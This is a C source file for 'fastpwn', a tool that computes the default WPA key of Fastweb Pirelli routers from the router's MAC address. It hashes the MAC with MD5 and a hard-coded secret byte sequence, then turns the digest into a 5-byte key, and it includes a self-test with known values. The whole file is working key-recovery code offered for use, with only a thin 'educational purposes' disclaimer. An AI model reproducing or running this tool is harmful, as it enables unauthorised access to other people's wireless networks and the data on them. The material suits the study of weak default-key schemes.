/*
Martesan's fastpwn
Enhanced by teknoraver

This program is intended for educational purposes only.
The Author disclaim all the responsabilities about the 
use of this program to commit unlawful actions ;)

Compile both simply with:
gcc fastpwn.c -o fastpwn -lcrypto
*/

#include <stdlib.h>
#include <getopt.h>
#include <stdio.h>
#include <string.h>
#include <limits.h>		/* for CHAR_BIT */
#include <openssl/md5.h>

#define BIT(nr)		(1 << (nr))
#define MAXBITS 129
#define BITNSLOTS ((MAXBITS + CHAR_BIT - 1) / CHAR_BIT)

int ssid_to_md5(unsigned char *, unsigned char *);
void md5_to_wpa(unsigned char *, unsigned char *);
void parse_mac(unsigned char *, unsigned char *);
int fwcrack(unsigned char *, unsigned char *);
void print_usage(FILE * stream, char *name, int exit_code);
unsigned char htoi(unsigned char *);
int test();

int do_test = 0, verbose = 0, quiet = 0;

int main(int argc, char *argv[])
{
	int next_option;
	const char *const short_options = "htqv";
	const struct option long_options[] = {
		{"help", 0, NULL, 'h'},
		{"test", 0, NULL, 't'},
		{"verbose", 0, NULL, 'v'},
		{"quiet", 0, NULL, 'q'},
		{NULL, 0, NULL, 0}
	};

	unsigned char ssid_parm[25] = "";
	unsigned char wpa[5] = "";

	int i = 0;

	do {
		next_option =
		    getopt_long(argc, argv, short_options, long_options, NULL);
		switch (next_option) {
		case 'h':	/* -h or --help */
			print_usage(stdout, argv[0], 0);

		case 't':	/* -t or --test */
			do_test = 1;
			break;

		case 'v':	/* -v or --verbose */
			verbose = 1;
			break;

		case 'q':	/* -q or quiet */
			quiet = 1;
			break;

		case '?':	/* invalid option.  */
			print_usage(stderr, argv[0], 1);
			break;

		case -1:	/* Done with options.  */
			break;

		default:	/* Something else: unexpected.  */
			print_usage(stderr, argv[0], 1);
		}
	}
	while (next_option != -1);

	if (quiet && verbose) {
		fprintf(stderr,
			"options 'Verbose' and 'Quiet' are in mutual exclusion, assuming Verbose\n");
		quiet = 0;
	}

	int passed = 1;
	if (do_test)
		passed = test();
	if (!passed)
		exit(1);	//exit with error
	// Get ssid from non options parameters
	if (optind != argc) {

		for (i = optind; i < argc; ++i)
			if (strlen(argv[i]) + strlen((char *)ssid_parm) +
			    1 <= 25)
				strcat((char *)ssid_parm, (char *)argv[i]);

		fwcrack(ssid_parm, wpa);

		if (!quiet)
			fprintf(stdout, "\nPossible WPA: ");
		for (i = 0; i <= 4; i++)
			fprintf(stdout, "%02x", wpa[i]);
		fprintf(stdout, "\n");
	}

	return 0;
}

int fwcrack(unsigned char *ssid_parm, unsigned char *wpa)
{
	int i;
	unsigned char ssid[6] = "";
	if (!quiet) {
		fprintf(stdout, "Cracking user provided SSID: \n");
	}			//TEST
	parse_mac(ssid_parm, ssid);
	if (!quiet) {
		fprintf(stdout, "SSID: ");
		for (i = 0; i < 6; i++)
			fprintf(stdout, "%02x", ssid[i]);
		printf("\n");
	}			//TEST

	unsigned char md5[16] = "";

	ssid_to_md5(ssid, md5);

	if (verbose) {
		fprintf(stdout, "MD5: ");
		for (i = 0; i <= 15; i++)
			fprintf(stdout, "%02x ", md5[i]);
		printf("\n");
	}

	md5_to_wpa(md5, wpa);

	return 0;
}

int test()
{
	if (!quiet)
		printf("\nExecuting integrity test:\n");
	unsigned char ssid_parm[25] = "00:1C:A2:BA:2C:E8";
	unsigned char ssid_t[6] = { 0x00, 0x1C, 0xA2, 0xBA, 0x2C, 0xE8 };
	unsigned char wpa_t[5] = { 0x69, 0x6e, 0x6d, 0x70, 0x01 };
	unsigned char md5_t[16] = {
		0x95, 0xed, 0x90, 0xa0, 0x1b, 0x4d, 0xe2, 0xf2,
		0xce, 0xd0, 0xad, 0xe1, 0x7f, 0x68, 0xac, 0x68
	};
	int pass = 1;

	unsigned char wpa[5];
	unsigned char md5[16];
	unsigned char ssid[6];

	parse_mac(ssid_parm, ssid);
	if (!memcmp(ssid_t, ssid, 6)) {
		if (!quiet)
			printf("SSID test ok\n");
	} else {
		if (!quiet)
			printf("SSID test FAILED\n");
		pass = 0;
	}

	ssid_to_md5(ssid, md5);
	if (!memcmp(md5_t, md5, 16)) {
		if (!quiet)
			printf("md5 test ok\n");
	} else {
		if (!quiet)
			printf("MD5 test FAILED \n");
		pass = 0;
	}

	md5_to_wpa(md5, wpa);
	if (!memcmp(wpa_t, wpa, 5)) {
		if (!quiet)
			printf("WPA test ok\n");
	} else {
		if (!quiet)
			printf("WPA test FAILED\n");
		pass = 0;
	}

	if (!quiet) {
		if (pass)
			printf
			    ("\nAll Test PASSED, the program seems to be correct.\n");
		else
			printf
			    ("\nWARNING, some integrity tests failed. Check your sources or the compilation parameters\n");
	}
	return pass;
}

void parse_mac(unsigned char *ssid_parm, unsigned char *ssid)
{
	unsigned char ssid_c[12] = "";
	unsigned char coppia[3] = "";
	unsigned int i, j = 0;
	if (verbose)
		printf("Parsing SSID from string %s : \n", ssid_parm);

	for (i = 0; i < strlen((char *)ssid_parm); i++) {
		if ((ssid_parm[i] >= '0' && ssid_parm[i] <= '9')
		    || ((ssid_parm[i] >= 'a' && ssid_parm[i] <= 'f')
			|| (ssid_parm[i] >= 'A' && ssid_parm[i] <= 'F'))) {
			ssid_c[j] = ssid_parm[i];
			if (verbose)
				printf("%c", ssid_c[j]);
			j++;
		}
	}

	if (verbose) {
		printf("\nSSID in chars: ");
		for (i = 0; i < 12; i++)
			printf("%c", ssid_c[i]);	//TEST
		printf("\n");
	}

	for (i = 0; i <= 5; i++) {
		coppia[0] = ssid_c[2 * i + 0];
		coppia[1] = ssid_c[2 * i + 1];
		coppia[2] = 0x00;
		ssid[i] = htoi(coppia);
	}

}

void md5_to_wpa(unsigned char *bytebuff, unsigned char *wpa)
{
	unsigned char bitarray[BITNSLOTS];
	memset(bitarray, 0, BITNSLOTS);

	unsigned char c;
	unsigned int i, j, k;
	unsigned char fivebitstr[26] = "";

	if (verbose) {
		printf("Regrouping this Md5:  ");
		for (i = 0; i < 16; i++)
			printf("%02x", bytebuff[i]);	//TEST
		printf("\n");
	}

	for (i = 0; i < 15; i++) {
		c = bytebuff[i];
		for (j = 0; j < 8; j++)
			if (c & BIT(7 - j))
				bitarray[i | j >> 3] |= BIT(j & 7);
			else
				bitarray[i | j >> 3] &= ~(BIT(j & 7));
	}

	j = 0;
	for (i = 0; i <= 25; i++) {
		c &= ~224;

		for (k = 3; k < 8; k++)
			if (bitarray[(j + k - 3) >> 3] & (BIT((j + k - 3) & 7)))
				c |= BIT(7 - k);
			else
				c &= ~(BIT(7 - k));
		j += 5;

		fivebitstr[i] = c;
		if (fivebitstr[i] >= 10)
			fivebitstr[i] += 0x57;
	}
	memcpy(wpa, fivebitstr, 5);
}

int ssid_to_md5(unsigned char *ssid, unsigned char *md5)
{

	MD5_CTX mdContext;
	unsigned int i;
	unsigned char mysterybytes[] = {
		0x22, 0x33, 0x11, 0x34,
		0x02, 0x81, 0xFA, 0x22,
		0x11, 0x41, 0x68, 0x11,
		0x12, 0x01, 0x05, 0x22,
		0x71, 0x42, 0x10, 0x66
	};

	MD5_Init(&mdContext);
	MD5_Update(&mdContext, ssid, 6);	// ssid 
	MD5_Update(&mdContext, mysterybytes, 20);	// magic no. 
	MD5_Final(md5, &mdContext);

//print the digest:
	if (verbose) {
		for (i = 0; i < 16; i++)
			printf("%02x", md5[i]);
		printf(" <-Calculated Md5\nprocessing Md5:\n");
	}

	return 0;
}

void print_usage(FILE * stream, char *name, int exit_code)
{
	fprintf(stream, "Fastweb Pirelli Routers default password pwner\n");
	fprintf(stream, "Usage:  %s options SSID \n", name);
	fprintf(stream,
		"	-h  --help		Display this usage information.\n"
		"	-t  --test		Test the integrity of the program\n"
		"	-q  --quiet		print only the wpa key \n"
		"	-v  --verbose		Print verbose messages.\n");
	fprintf(stream, "Example:  %s  01:02:03:04:05:06  \n", name);
	fprintf(stream, "Example:  %s  -q 010203040506  \n", name);

	exit(exit_code);
}

unsigned char htoi(unsigned char *ptr)
{
	unsigned char value = 0;
	unsigned char ch = *ptr;

	while (ch == ' ' || ch == '\t')
		ch = *(++ptr);
	for (;; ch = *(++ptr))
		if (ch >= '0' && ch <= '9')
			value = (value << 4) + (ch - '0');
		else if (ch >= 'A' && ch <= 'F')
			value = (value << 4) + (ch - 'A' + 10);
		else if (ch >= 'a' && ch <= 'f')
			value = (value << 4) + (ch - 'a' + 10);
		else
			return value;
}
